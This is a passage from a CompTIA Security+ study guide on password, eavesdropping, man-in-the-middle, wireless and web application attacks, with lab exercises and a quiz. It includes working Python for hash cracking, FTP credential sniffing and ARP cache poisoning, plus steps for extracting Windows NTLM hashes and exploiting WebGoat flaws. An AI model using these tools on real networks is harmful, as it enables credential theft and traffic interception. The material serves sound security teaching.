symbols are less vulnerable to dictionary attacks even if they use familiar words.
Hybrid attack An improved dictionary attack, which tries not only dictionary entries, but also common
variants such as added numbers or character substitutions. For example, where a
dictionary attack might try password (distressingly, the second most common leaked
password of 2015), a hybrid attack might also try variants like password1, !password,
and p@ssw0rd.
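
To make these approaches concrete, here's a minimal dictionary/hybrid cracking sketch in Python. It assumes
the attacker already has an unsalted MD5 hash of the target password; the hash value, word list, and variant
rules are illustrative assumptions, not the workings of any particular cracking tool.

# Minimal dictionary/hybrid cracking sketch (educational use only).
# Assumes a stolen, unsalted MD5 hash; real tools are far faster and apply many more rules.
import hashlib

stolen_hash = hashlib.md5(b"p@ssw0rd1").hexdigest()    # hypothetical target hash
wordlist = ["letmein", "football", "password"]         # hypothetical word list

def variants(word):
    # Hybrid rules: the word itself, common suffixes, and character substitutions.
    yield word
    for suffix in ("1", "123", "!"):
        yield word + suffix
    substituted = word.replace("a", "@").replace("o", "0")
    yield substituted
    yield substituted + "1"

for word in wordlist:
    for guess in variants(word):
        if hashlib.md5(guess.encode()).hexdigest() == stolen_hash:
            print("Cracked:", guess)

Purpose-built cracking tools follow the same logic, but apply thousands of mangling rules and can test an
enormous number of guesses per second on modern hardware.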

Even when attackers can steal password data outright from something like a user database file or a network
authentication packet, they still might need to crack it. This is because for security reasons passwords are
frequently stored or transmitted only in the form of a cryptographic hash created from the actual password.
Implemented properly, hashes can be used for authentication without exposing the password itself to spies or
hackers, but since hash functions are imperfect they can also be cracked, or used to crack passwords.

84 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module D: Network attacks

Birthday attack Hashing functions are vulnerable to hash collisions, where two different inputs create the
same hash. When hashes are used to transmit or verify passwords, this means the hacker
doesn't need to know the actual password—any password that generates the same hash
will do. For weaker hashing algorithms, this can greatly increase cracking speed for
passwords and anywhere else cryptographic hashing is used.
Note: Birthday attacks are named for the birthday problem in probability
theory, a seeming mathematical paradox. Despite there being 365 days in
the year, if you gather just 23 random people in a room there's a better than
50% chance that two of them will share the same birthday. The underlying
mathematics are beyond the scope of this topic, but they're very similar to
those used in the attack.
Rainbow table Pre-computed tables containing a large number of hash values, which can be used to
quickly find the password behind a particular hash. Rainbow tables are an effective way
to quickly attack a large number of different passwords, but they are an example of a
time-memory tradeoff: a complete hash table even for fairly short passwords might be
many gigabytes in size. Rainbow tables are typically created using more complex
algorithms that reduce the table size but make cracking take longer than a simple hash
table.
Pass the hash Even if attackers can't directly crack stolen hashes to retrieve passwords, they might not
need to. In single sign-on systems using NTLM or Kerberos for authentication, it's
sometimes possible for an attacker to compromise one system and steal the hashes stored
there. The attacker can then present a stolen hash to access resources on another
computer on the network, without ever learning the password itself.

Password attacks of any sort are potent only if passwords are weak or improperly stored and transmitted.
Strong password policies can make cracking attempts impractical, and even stored password hashes can use
salting or key stretching techniques that render rainbow tables ineffective. By contrast, weak cryptographic
implementations can make even a long password or encryption key easy to crack.
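
As a rough sketch of what salting and key stretching look like in practice, the Python example below stores a
password using a per-user random salt and many PBKDF2 iterations; the iteration count and function names in
this sketch are illustrative assumptions, not a specific recommendation.

# Sketch of salted, stretched password storage (parameters are illustrative only).
import hashlib, hmac, os

def store_password(password):
    salt = os.urandom(16)       # a unique random salt defeats precomputed rainbow tables
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100000)
    return salt, digest         # store the salt and digest, never the plaintext

def verify_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100000)
    return hmac.compare_digest(candidate, digest)

salt, digest = store_password("P@ssw0rd")
print(verify_password("P@ssw0rd", salt, digest))   # True
print(verify_password("password", salt, digest))   # False

Because every stored password gets its own salt, an attacker can't reuse one precomputed table against the
whole database, and the repeated iterations make each individual guess far more expensive.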

Exercise: Cracking passwords


In this exercise, you'll use a password-cracking application to find your current Windows password.
Do This How & Why

1. In Windows 7, double-click the Cain icon on the desktop.
   Click OK when you see the firewall warning.

2. Extract the NTLM hashes from the local system.
   Windows stores passwords as hashes in the local system. They're not meant to be extracted, but can
   be cracked by brute force.

a) On the Cracker tab, click LM & NTLM Hashes.


b) Click the right pane, then click the add (+) button.
   The Add NT Hashes from window appears. You'll keep the defaults.

c) Click Next.
   The Windows local password hashes are extracted into Cain, but you still need to crack them.

3. Crack the Administrator password. You'll use a brute force cracking technique, since it's not a
dictionary password.

a) Right-click Administrator and click Brute-Force Attack > NTLM Hashes.
   The Brute-Force Attack window opens.

b) Click Custom.
   You know that the password is P@ssw0rd, so you'll make sure the right characters are in there.

c) In the Custom field, type pP2@sS$wWoO0rRdD.
   These are the characters of "Password" and the ones most similar to them.

d) If time is limited, in the Start From field, type P@ssw0rd.
   You'll have it start on the right one to save time.

e) Click Start. Sooner or later, the password is discovered.

4. Close all open windows.


Eavesdropping
Especially on networks, sensitive information isn't just what's sitting in files on servers: it's also what's being
actively sent around the network. Attackers after this sort of information don't need to log in as long as they
can just passively listen to network traffic and intercept what they want with little risk of detection. Even
worse, they might be able to intercept login credentials to get in at a later time, or secretly modify information
in transit to attack integrity as well as confidentiality.

Exam Objective: CompTIA SY0-501 1.2.4.9, 2.3.1


Any kind of eavesdropping requires the attacker to access a node or link carrying traffic: this could be
plugging into an interface, physically tapping a cable, or just getting in range of wireless transmissions or the
RF emanations of a wired connection. A NIC set to promiscuous mode (with or without its owner's
knowledge) can be used for packet sniffing, or recording network traffic that's addressed to other hosts.
Switches often have port mirroring functions that send traffic to network monitoring systems for diagnostic
purposes, but that provides access for an attacker too.
On the LAN, network segmentation helps to limit the traffic a given eavesdropper can hear. This can be seen
as a security feature, but it's not entirely reliable since it's easily circumvented by many attacks. VLAN
hopping and ARP poisoning are just two methods inside attackers can use to overcome segmentation.
Sometimes accessing packets is all an attacker has to do to compromise a network, just because a lot of
network traffic is unprotected plaintext. Many popular protocols for connectivity, management, and network
applications transmit "in the clear," even when sessions themselves require passwords. Such insecure
protocols include HTTP, FTP, Telnet, POP, IMAP, SLIP, and SNMPv1 and v2. Worse, the passwords
themselves can be plaintext, so an eavesdropper just has to watch a connection being made to steal login
credentials for later.
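
As an illustration, the sketch below uses the Scapy library to watch for FTP logins crossing the local
interface; it assumes a lab network you're authorized to monitor, and it simply prints USER and PASS
commands as they pass by in the clear.

# Minimal credential sniffer sketch using Scapy (authorized lab use only).
from scapy.all import sniff, TCP, Raw

def show_credentials(pkt):
    # FTP sends its commands as plain text, so USER and PASS lines are readable.
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        data = pkt[Raw].load
        if data.startswith(b"USER") or data.startswith(b"PASS"):
            print(data.decode(errors="replace").strip())

# Port 21 is FTP's control channel; store=False avoids keeping packets in memory.
sniff(filter="tcp port 21", prn=show_credentials, store=False)
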
Secure protocols using encrypted data are safer from eavesdroppers, but that doesn't mean they're fully
protected: some encryption methods are weak or exploitable. One simple example is the known plaintext
attack. If an encryption algorithm is weak and the attacker knows part of the plaintext
(such as frequently used sequences of data), it's possible to deduce the key from that part of the
ciphertext and unlock the entire message.
Even information that isn't secret, or that is safely encrypted, can still be useful to an eavesdropper who's
gathering host or user information, or planning certain types of later attacks.

Man-in-the-middle attacks
A more complicated but potent form of eavesdropping is the man-in-the-middle attack, where an attacker
intercepts and relays traffic between hosts, impersonating each host in the eyes of the other. Each end of the
conversation thinks it's communicating directly, but in truth the whole conversation is under the attacker's
control.

Exam Objective: CompTIA SY0-501 1.2.2.3, 1.2.2.13, 1.2.2.15, 1.2.2.17.2, 1.2.4.7, 1.2.4.8


MitM attacks can be initiated in a lot of ways, such as ARP cache poisoning. In this example, Alice wants to
connect to Bob's server. She tries to log in, but the attacker, Mallory, has used spoofed ARP packets to
convince Alice's computer that Mallory's own MAC address is actually Bob's. As a result, the packets go to
Mallory instead. Mallory doesn't just capture them: she relays them right along to Bob in Alice's name, so the
login can outwardly continue as normal. The same thing happens in reverse: when Bob thinks he's answering
Alice, he's actually replying to Mallory in disguise. A whole session can continue that way; at the end Mallory
has all the information exchanged, but Alice and Bob never know anyone else was listening.
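
For illustration, a minimal version of Mallory's ARP cache poisoning might look like the Scapy sketch below;
the IP and MAC addresses are hypothetical, and sending frames like these is only legitimate on a lab network
you control.

# ARP cache poisoning sketch with Scapy (lab networks only; addresses are hypothetical).
from scapy.all import ARP, send
import time

victim_ip, victim_mac = "10.10.10.5", "aa:bb:cc:dd:ee:01"   # "Alice"
server_ip = "10.10.10.2"                                     # "Bob"

# op=2 is an ARP reply claiming that server_ip is at the attacker's MAC
# (hwsrc defaults to the sending interface's own address).
poison = ARP(op=2, psrc=server_ip, pdst=victim_ip, hwdst=victim_mac)

while True:
    send(poison, verbose=False)   # resend so the poisoned cache entry doesn't expire
    time.sleep(2)
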
Other variants of MitM rely on gathering information via packet sniffing, and then using it to take over
communications or gain independent access.

Replay attack The attacker intercepts data transmissions, especially those with authentication
credentials or encryption key exchanges, then delays or resends them. This allows the
attacker to disrupt legitimate communications, gain unauthorized access, or both. Replay
attacks can be thwarted by timestamps and number sequences, which will not be updated
in the replayed communications.
Session replay In TCP/IP networks, TCP establishes ongoing communication sessions between two
hosts but relies on application layer protocols to handle security. Some of these are
susceptible to replay attacks. HTTP, used by websites and web applications, is one
example of a stateless protocol, meaning that web servers don't inherently know if a
request is coming from a new client or an existing one. To solve this, sites requiring
authentication need session identifiers such as cookies or special URL data to associate
an incoming request with an existing session. Poorly configured servers or careless users
allow an attacker to replay the session identifier later; from the server's perspective, it's
just continued communication with the same user.
Session hijacking Similar to session replay, except the attacker takes over the session immediately after the
client logs in. Session hijacking can be more visible since the legitimate client might
notice what happened, but it can overcome some anti-replay measures.
Downgrade Many secure protocols use strong encryption by default, but allow weaker encryption for
backward compatibility with hosts that don't support the newest standards. Some might
even fall back to plaintext communications. In a downgrade attack, the attacker interferes
with the initial connection setup to trick legitimate clients into using weak or no
encryption. This doesn't in itself take control of the connection, but it weakens security
enough to make other attacks possible.
Man-in-the- An attack where a trojan or other spyware infects a web browser, then modifies either the
browser pages the user views or the actions the user takes. This can bypass strong network
encryption by functioning within the browser itself, and it can be triggered whenever the
user navigates to a targeted site.
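
As the replay entry above notes, timestamps and sequence numbers are the usual countermeasure. The sketch
below shows a simplified server-side check that rejects stale or repeated messages; the message fields and
time window are assumptions for illustration, and a real protocol would also authenticate them with a MAC or
signature so an attacker can't simply forge fresh ones.

# Simplified anti-replay check: reject stale timestamps and reused nonces.
import time

seen_nonces = set()
MAX_AGE = 30   # seconds of clock skew tolerated; an assumed value

def accept_message(nonce, timestamp):
    if abs(time.time() - timestamp) > MAX_AGE:
        return False              # too old (or from the future): possible replay
    if nonce in seen_nonces:
        return False              # already processed: a replayed message
    seen_nonces.add(nonce)
    return True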


The whole process might sound more complicated and risky than just eavesdropping, and it is, but it
overcomes a lot of the weaknesses of passive listening. MitM attacks can eavesdrop on strongly encrypted
conversations by separately negotiating encryption with each host; that way, when the packets pass through
the attacker's system they'll be decrypted into plaintext and easy to read. Additionally, since the MitM relays
information rather than passively listening, an attacker can freely modify it. If Alice were connecting to her
bank, Mallory could change transaction amounts and destinations, sending money to her own account. She
can even send false confirmation information back, so Alice sees only the transaction she entered.

Exercise: Simulating an eavesdropping attack


A lot of popular network protocols are easy for eavesdroppers to scan for valuable information.
Do This How & Why

1. On your Windows 7 desktop, double-click Wireshark.
   Wireshark is a network analyzer application that can capture network traffic. It will take a few
   moments to open and load all modules.

2. Start capturing network traffic. In this case you'll only be scanning traffic over this system's
network interface, but anyone on your local network segment
could view the same data.

a) In the Wireshark window, click Local Area Connection.

b) In Wireshark's main toolbar, click the Start capture button.
   Wireshark begins displaying all network traffic. Any packets that go through your network interface
   will appear in the upper pane.

3. Create an FTP connection.

a) Open a command window. Type cmd into the Search box.

b) Type ftp 10.10.10.2 You're prompted for a user name and password.

c) Enter user as your user name, and You're logged into the FTP server.
T3mpUser as your password.

4. Review the logged FTP traffic.

a) In Wireshark, click the Stop capture button.
   Wireshark stops capturing, but what you already captured is still on display.


b) In the filter bar, type ftp and press Enter.
   The logged traffic is filtered to show only the FTP conversation. It shows the content of the
   conversation too, but you'll read it a little more clearly in the next step.

c) Right-click any packet and click Follow > TCP Stream.
   Since FTP is a plaintext protocol, not only are the commands clearly readable, so are the user name
   and password.

5. Who else might have been able to learn your password?
   In theory, anyone on any network segment between you and the FTP server could have viewed the
   conversation, including the password. On a trusted network this isn't so bad, but over a public
   network or the internet it could be a serious risk.

6. Close all open windows.


Wireless attacks
The features that have made wireless networks so popular also introduce new vulnerabilities, as do the
specific implementations used by many common standards. It's no surprise, then, that a number of new
attacks have become popular. For the most part they operate on the same principles as wired network attacks;
it's just that the physical nature of a wireless network makes certain attacks much easier.

Exam Objective: CompTIA SY0-501 1.2.3


The most obvious difference is that any attacker in range of a wireless network can connect or eavesdrop
without looking for a port or wire. That alone is most of the reason why access control and encryption are much
more prominent in Wi-Fi technology than in Ethernet, but even with those measures, sniffing is far easier
than on a wired network. MAC addresses aren't encrypted, so they can be targeted by MAC spoofing attacks. Some
versions of Wi-Fi encryption are vulnerable to replay attacks. Others are password-based, and weak
passwords can potentially be cracked.
Wi-Fi intruders very often aren't malicious, but are instead just looking for free Wi-Fi so they can access the
internet. That doesn't mean they're no problem: intruders of any kind consume network resources, and there's
no way to tell that someone is "only" a freeloader. In addition to intrusion itself, there are other common
wireless attacks; some are unique to wireless technologies, while others are variants of existing wired attacks.

Wardriving An attacker physically searching an area for wireless hotspots, typically but not always
from a moving vehicle. The attacker uses an ordinary mobile device with Wi-Fi capability,
running an application designed to identify and map Wi-Fi networks. The name comes
from wardialing, an old hacking technique for discovering phone numbers with listening
modems by dialing many numbers in sequence. Malicious wardrivers may go a step
further, and try to compromise the security of WAPs as they find them.
Encryption Secured Wi-Fi networks encrypt all traffic, but the available encryption standards have
attacks known vulnerabilities, some serious.
 Like any password-based security, pre-shared key (PSK) based security is easy to
crack if the password is easy to guess, but that's only the start.
 The first Wi-Fi encryption standard, WEP, has serious vulnerabilities in its
initialization vector (IV) setup process. Using replay attacks, an attacker can
trivially break WEP no matter how strong the password is.
 The newer WPA and WPA2 standards are stronger than WEP, but still have
problems. Not only can a weak password still be cracked, they support two
encryption modes, TKIP and AES. While AES is very strong, TKIP has similar
(though much less severe) IV vulnerabilities to WEP.
 The Wi-Fi Protected Setup (WPS) feature intended to allow administrators to easily
join trusted devices to the network contains a major vulnerability. When enabled, it
effectively provides an alternate password, with a flaw that renders it easy for a
determined attacker to brute force crack in a matter of hours.

Rogue AP An unauthorized WAP connected to the wired network, commonly by an employee or


other insider. Like a rogue server, a rogue AP doesn't have to be malicious to be a threat: it
introduces new avenues of attack to the rest of the network, and might not be properly
secured by its owner.
Evil twin A rogue AP that has the same SSID and security settings as a legitimate AP, so that users
might connect to it instead of the real one. The evil twin's controller can use it to launch
MitM attacks on anyone who connects to it instead of the real AP.


Disassociation Sending a packet with a spoofed address that de-authenticates a client from a Wi-Fi
network. This attack can be launched by anyone in range of the hotspot, even if it's an
encrypted connection. Disassociation can be used as a DoS attack on its own, or to set up
evil twin or encryption attacks when the client tries to reconnect.
Jamming Since wireless networks are subject to interference from other radio sources and tend to
use popular portions of the radio spectrum, an attacker can jam the signal by introducing a
competing one, as a physical layer DoS attack.
Bluejacking Sending unsolicited messages to a Bluetooth device. Usually harmless, but can be
considered intrusive or annoying.
Bluesnarfing Unauthorized theft of information from a Bluetooth device. Newer mobile devices are
more resistant to this, but older software can be vulnerable.
NFC Extremely close range Near Field Communication is harder to eavesdrop or intrude on
than other wireless technologies, since the attacker has to get within inches of the target.
However, since NFC is intended for sensitive communications like payment or
authentication systems, it's a prime target for attackers. Emerging NFC attacks could allow
attackers to steal information or money from vulnerable smartphones even in their users'
hands or pockets, using a combination of protocol exploits and pickpocketing technique.
RFID NFC is only one subset of the larger field of Radio frequency identification technology.
Others are used for tracking goods and devices, electronic locks, toll collection, and
tracking people or animals. Most other RFID technologies work at a longer range than
NFC and many have fewer security features, so they can be even more at risk. On the
other hand, most RFID technologies support more limited communications than NFC and
carry less sensitive information.


Assessment: Network attacks


1. Complex passwords that are combinations of upper and lower case letters, numbers, and special
characters protect your system from which types of attacks?
 Birthday
 Brute force
 Dictionary
 Man-in-the-middle
 Zero-day

2. As a user, what can you do to protect yourself from man-in-the-middle attacks? Choose the best response.
 Avoid connecting to open WiFi routers.
 Avoid following links in emails when possible.
 Enable Firewall protection.
 Install only the application software you need.
 Use complex passwords that are combinations of upper and lower case letters, numbers, and special
characters.

3. What tools allow amplification of a DoS attack? Choose all that apply.
 Bluesnarfing
 Botnets
 Malformed packets
 Reflection
 VLAN hopping

4. Evil twins are mostly used as part of what kind of attack? Choose the best response.
 Denial of service
 Man-in-the-middle
 Phishing
 Trojan horse

5. What kind of attack is against a software vulnerability which hasn't been patched yet? Choose the best
response.
 DDoS
 Pharming
 Smurf
 Zero day


Module E: Application attacks


As operating systems and core networking protocols have become more secure, hackers are increasingly
turning their attention toward new targets. Web browsers and server applications are among the most tempting
targets, not least because so much commerce, financial, and personal data today is available on the web.
Vulnerabilities in rapidly evolving software, and in the ways multiple applications interact, give attackers
many ways to manipulate applications, steal data, or gain system access. As a result, in recent years web
application attacks have become one of the most common vectors for damaging data breaches.
You will learn:
 About application vulnerabilities
 How application attacks do damage
 About server-side injection attacks
 About client-side attacks

About application vulnerabilities


There isn't a clear boundary between application attacks and attacks at the application layer of the network. In
general, "application attacks" refers to attacks exploiting web applications and browsers, associated databases
and scripting languages, and so on, regardless of the underlying network protocols being used. Not that the
distinction matters much in practice: if you're securing the network properly, you'll be examining it as a
whole, at every layer.
Some common network attack strategies can be either classified as application attacks, or used as part of one.
DoS attacks can be used to impair or disable web services. Stolen or easily guessed passwords can work on
web-based authentication systems just as well as on a remote access program. Spoofing attacks and insecure
protocols can allow for eavesdropping, man-in-the-middle, or session hijacking.
Attacks on the protocols and languages used by web applications themselves are also common. Some rely on
coding flaws built into a given application or protocol: maybe it responds inappropriately to certain input, or it
uses trust mechanisms that are easy to exploit. Others rely on common or default but unsafe application
settings which can be exploited. Many web applications actually involve a number of applications and
components working together, often even from different vendors, and every intersection of components is
another place where a vulnerability might exist.
At the core, most vulnerabilities are based on applications and protocols that are too trusting of the input they
receive, especially from seemingly authenticated sources. The cause could be an oversight, since it can be
difficult to anticipate all the ways unexpected input could cause an error or breach. Robust design can even
contribute to vulnerabilities: an application that attempts to process improperly formatted input as best it can
is more compatible with other applications or components that produce non-standard output, but it will also
accept the deliberately malformed input an attacker crafts. The problem
with trust and flexibility in application design is the same as that with human behavior against social
engineering—as beneficial as they are in a trusting environment, as soon as you encounter a malicious actor
you're going to be hurt.


Application exploits
Like any other sort of attack, application attacks can be categorized different ways: attack vectors, end goals,
technical mechanisms, targeted applications, and so on. Common attack goals include the following:

Exam Objective: CompTIA SY0-501 1.2.2.8, 1.6.7

Privilege escalation Gaining increased privileges within an existing session, for example accessing
administrator-only commands from an ordinary user account. Privilege escalation
vulnerabilities can turn even restrictive guest access into a perfect foot in the door for
an attacker, and they're a factor in many other attacks.
Directory traversal Accessing directories on the target machine that normal requests cannot. For
example, when you interact with a web server you can normally only access files in
its web folders. A directory traversal attack could let an attacker access the server's
root folder, and from there everything else on the machine.
Arbitrary code Executing machine code of your choice on a remote computer, also known as remote
execution code execution. This is the most dangerous result of an application attack, since in
conjunction with privilege escalation it can give the attacker full control of the
remote computer.
Resource exhaustion Just like network systems, an application can be overwhelmed by malicious requests
that consume its resources until it either crashes or is just too busy to respond
properly to legitimate users. The attacker's requests could be designed to generate
errors, consume excessive CPU time or memory space, or there just may be so many
incoming requests that the host computer can't keep up. This isn't very likely to result
in a data breach unless the application fails in an insecure way, but it's an effective
denial of service attack.
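
As a sketch of how directory traversal is usually prevented (and how its absence is exploited), the example
below resolves each requested path and confirms it stays inside the web root; the paths shown are hypothetical.

# Directory traversal check sketch: resolve the requested path and confirm it
# stays inside the web root (paths here are hypothetical).
import os

WEB_ROOT = "/var/www/html"

def safe_path(requested):
    full = os.path.realpath(os.path.join(WEB_ROOT, requested))
    # Without this check, a request like "../../etc/passwd" escapes the web root.
    return full if full.startswith(WEB_ROOT + os.sep) else None

print(safe_path("index.html"))        # allowed: /var/www/html/index.html
print(safe_path("../../etc/passwd"))  # None: traversal attempt rejected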

Input manipulation
Anyone who can access a web application has to work through its available input methods. Insecure
applications allow many ways an attacker can send malicious input.

Exam Objective: CompTIA SY0-501 1.2.2.5, 1.6.3

Header manipulation Changing values in the headers used by a communication protocol, either one
directly used by an application or by the underlying network layers. MAC and IP
address spoofing are examples of header manipulation, as are Xmas attacks and
other non-standard flag use. Session hijacking attacks frequently rely on TCP
header manipulation.
Memory manipulation Sending input into a program that will affect variables and other values in memory,
either to produce unexpected behavior or to crash the application as a denial of
service attack.
Injection A broad term for sending specially formatted input that will be processed by some
sort of command interpreter within the web application or its host machine. In
general, injection relies on command languages used within the server itself but not
intended to be entered in user input fields, such as SQL, XML, or even command
line syntax.


Memory vulnerabilities
Applications can be attacked through how they use memory. Depending on the vulnerability type, attackers
can use malicious input, or can use an already-compromised application to attack other applications or the
host machine.

Exam Objective: CompTIA SY0-501 1.2.2.4, 1.6.12

Buffer overflow Sending too much information in a request sent to an application, enough to overfill the
memory buffer meant to store it and overflow into adjacent memory. For example, an
attacker could upload a large file where the application expects a short string of text.
Vulnerable applications react badly to buffer overflows: they might have predictable
failures attackers can exploit, or unpredictable ones attackers can gamble on. The most
serious enable arbitrary code execution by reading the overflow as a program to run.
Integer overflow Setting an integer variable to a value that exceeds the maximum size set aside to store
it, usually through addition or multiplication functions. Unlike a buffer overflow, an
integer overflow doesn't spread into other memory. It just makes the number "wrap
around." For example, an unsigned 8-bit variable allows values between 0 and 255. If
you push it up to 256, the application will read it as 0, potentially causing undesired
behavior.
Pointer dereference Many programming languages use pointer variables that reference another value held
somewhere in memory. In those languages you can dereference a pointer, or directly
retrieve the value it points to. Programs can also have null pointers that don't point to
valid memory values but are useful in other ways. An attacker manipulating a
vulnerable application can potentially force it to dereference a null pointer, generating
an error that can crash the application. Alternatively, it might bypass a security
function, or return useful debug information to an attacker.
Memory leak Programs are supposed to allocate memory when they need it, and release it when
they're done with it. Coding errors can cause an application to allocate memory but
never release it, effectively "leaking" system memory into the program over time and
eventually consuming so much memory that the application or even the host crashes.
An attacker can manipulate vulnerable applications to leak memory as a denial of
service attack.
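
Python's own integers never wrap, but the fixed-size types used by lower-level languages do. The short sketch
below uses the ctypes module to illustrate the 8-bit wraparound described above.

# Integer overflow illustration: an unsigned 8-bit value silently wraps around.
import ctypes

counter = ctypes.c_uint8(255)   # the largest value an unsigned 8-bit variable can hold
counter.value += 1              # adding one wraps to 0 instead of reaching 256
print(counter.value)            # prints 0, which could defeat a length or price check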

Race conditions
Race conditions are one of the most commonly exploited application vulnerabilities, behind overflow and
injection attacks, but the reasons why might be a little less clear when you're not a programmer. Programs,
like other processes, are full of tasks that have to occur in a certain order, even if you don't do one
immediately after another. Imagine you're making soup. You have to taste the soup, and if it's bland you add
some salt. Assuming you have a perfect, computer-like memory there's no reason for you to do it immediately.
Instead you can go and chop some ingredients on the countertop, then bring the salt on the way back.

Exam Objective: CompTIA SY0-501 1.6.1


Add a busy kitchen with many people working on the same dishes, and things can go wrong. You might taste
it, find out it needs salt, then before you get around to adding it someone else tastes the soup and adds salt.
Not knowing this, you add more salt, and now the soup has too much. This is a race condition. More
specifically, it's called a time of check to time of use (TOCTOU) error, since something changed between when
you checked something (the soup's saltiness) and used the result of the check (by adding salt.)
This sort of race condition is a constant risk in computing just because most computers are like that busy
kitchen, with multiple programs running simultaneously and at immense speeds. The timing of when
programs use the processor is controlled by the operating system, so programs could potentially interfere with
each other. Even a delay of a few milliseconds a human wouldn't notice is enough time for a computer to do a

lot of work. For example, it's possible for a program to check the contents of a file, decide on a change it
wants to make, but then due to processor scheduling a different program edits the same file before the first
program applies the change. Such a condition could lead to incorrect contents, or even a corrupt and
unreadable file. This is why operating systems frequently lock a file for editing, so that only one application
can alter it at a time.
Modern computers have even more opportunities to generate race conditions too. Not only can powerful
servers have multiple CPUs that can execute programs simultaneously, new desktop and mobile computers
have multi-core CPUs that individually behave as multiple processors. To take advantage of this, many
applications generate multiple processing threads that are scheduled and run on different cores like
independent processes. This means even within a program a race condition might be difficult to avoid.
None of this so far is specific to security, outside of how bugs and corrupted data damage availability, but it's
possible for a race condition to compromise security, and even for an attacker to manipulate one deliberately.
For example, a keylogger could be used to exploit a race condition in a two-factor authentication system by
observing a single-use token as it's typed in, then submitting the code on the attacker's behalf before the user
can, hijacking the session. Other race conditions can be exploited to cause integer overflows, or to dereference
null pointers.
Another possibility is manipulating the order of operations in e-commerce applications. In an extreme case,
an attacker could use the right input to make a small purchase, choose a payment method, then add a lot of
expensive items to the cart in the brief moments while the payment card is being processed. When the card is
approved, the vulnerable application doesn't realize the cart contents have changed, so it marks the whole
order as approved and ready to ship for the cost of the original small order.
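
To see the check-then-act window in miniature, the sketch below runs two Python threads against a shared
balance: each checks the balance, pauses briefly, then withdraws, so both can pass the check before either
deducts. The account values and delay are made up for illustration; a lock or an atomic database transaction
would close this particular window.

# Time-of-check/time-of-use sketch: the balance check and the withdrawal are not
# atomic, so two threads can both pass the check before either one deducts.
import threading, time

balance = 100

def withdraw(amount):
    global balance
    if balance >= amount:       # time of check
        time.sleep(0.01)        # simulated processing delay
        balance -= amount       # time of use: the check may no longer hold

threads = [threading.Thread(target=withdraw, args=(100,)) for _ in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(balance)                  # frequently -100: both threads passed the check
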
There isn't a single fix for race conditions. The circumstances that made them possible are deeply ingrained
into how high performance computers work, and they're notoriously hard to recognize or reproduce. It's
possible to make application or operating system safeguards against specific examples of race conditions, but
in the general case it's something that can only be prevented by secure application design.

Exercise: Exploring application vulnerabilities


For this exercise you'll need to use the Dojo VM. You'll test two application attacks in Web Security Dojo,
a self-contained training environment that includes both penetration testing tools and vulnerable web
applications.


Do This How & Why

1. In the Dojo VM, start WebGoat.
   WebGoat is a deliberately insecure web application OWASP uses to demonstrate application
   vulnerabilities.

a) Click the menu button, then Targets > WebGoat NG Start.
   After a few moments, WebGoat opens in Firefox.

b) Sign in with username guest and password guest.
   The main application opens. WebGoat contains lessons for a wide variety of application flaws.

c) Examine the WebGoat interface. In the center is an explanation of how to use WebGoat. The left
pane is a lesson list, and the right pane is a list of cookies and
parameters currently being used by the site.

2. Create a buffer overflow error. By sending too much information in a form field or other
input, you can make vulnerable applications behave in
unintended ways.

a) In the navigation pane, click Buffer Overflows > Off-by-one overflows.
   This application manages a purchase page for hotel Wi-Fi. You've been told that by putting bad data
   into the form fields you can get it to reveal information about other customers.

b) Enter your first and last name. Or whatever name you like.

c) In the Room number field, enter at least 4100 characters.
   It's easiest to create that many by copying and pasting inside of a text file, then pasting it into
   the field.

d) Click Submit. To move to the next page of the form. You're asked to choose a
plan type.

e) In Firefox, click Tools > Web Developer Extension > Forms > Display form details.
   This Firefox extension allows you, or any other attacker, to view and alter a variety of web page
   information normally hidden from the user. The form is still keeping the data you entered on the last
   page, in order to submit it all at once. It's just hidden from you normally.

f) Hide form details.
   Click Tools > Web Developer Extension > Forms > Display form details.


g) Click Accept terms. To finish the purchase. No error displays, but WebGoat
informs you that your attack worked.

3. View all customer names. The buffer overflow allowed you to display all user names.

a) Show form details again.

The buffer overflow error made the application return a full list
of guests and their rooms, as hidden fields within the page.
One of them is racing driver Lewis Hamilton.

b) Hide form details.

c) Click Restart Lesson. To return to the first page of the form. To finish the lesson, you
must enter Lewis Hamilton's information.

d) Enter Hamilton's information.

He's in room 9901.

e) Click Submit, then Accept Terms.
   To complete the lesson. Even a seemingly minor PII breach like this could expose a guest to a stalker
   or thief. If you ran this hotel, you'd be responsible for protecting your guests' privacy against
   this sort of intrusion.

4. Begin a fraudulent purchase. For your next attack, you'll generate a TOCTOU error in a
vulnerable e-commerce app to get a fraudulent discount on an
expensive item.

a) In the navigation pane, click This application is the shopping cart for a web store. There are
Concurrency > Shopping Cart four available items, each with its own price.
Concurrency Flaw.

b) In the navigation pane, right click To perform this attack you need to have two copies of the page
Shopping Cart Concurrency open. The website associates both of them with your user
Flaw and click Open Link in New account.
Tab.


c) In the first browser tab, enter 1 in the first Quantity field.
   The 750 GB hard drive is the least expensive item in the list.

d) Click Purchase.
   You're asked to complete your purchase by entering payment information.

5. Exploit a race condition.

a) Switch to the other tab. It still shows your empty shopping cart.

b) Add a Sony Vaio to your cart. Type 1 in the third Quantity field, but don't click anything yet.

c) Click Update Cart.
   To update your cart contents. It now shows a much more expensive laptop in your cart.

d) Switch to the first tab. It shows your confirmation screen. It hasn't updated, so it
shows your payment information and a total of $169.00.

e) Click Confirm.
   To complete your purchase. Since the last update of your cart placed a laptop in it, you've ordered
   that, but since the confirmation screen had the price of a hard drive the store only charges you a
   fraction of the real cost. Careless coding allows a wide range of race conditions like this one,
   which can enable theft, privilege escalation, or data breaches.

6. Close one tab. Leave the other open for the next exercise.


SQL injection
One of the most common and dangerous attacks facing web applications today is SQL injection, but in order
to understand what it is, you need to know a bit about how web applications work.
Most websites and applications communicate with online databases to generate page content. This is
immensely important on today's web, and not just for filling out forms. When you load up your page on
Facebook, the actual HTML and CSS source code doesn't define more than a blank framework with spaces
for your news feed, friends list, trending stories, and so on. Actually populating all those areas is the job of
scripts, which make queries against the enormous databases Facebook uses to store all of its users, posts, and
so on. Even much of the HTML framework is actually called up by scripts. Likewise, when you search for
products on a web store, database queries are used to search the product database and load up any matching
results. Large or small, any website that delivers dynamic content relies on combining front-end server code
with a back-end database. The most common way for front-end and back-end systems to communicate is
Structured Query Language (SQL), an ISO standard used by most relational database software.
When used normally, SQL commands are generated by some mix of the page's scripts and the client's input,
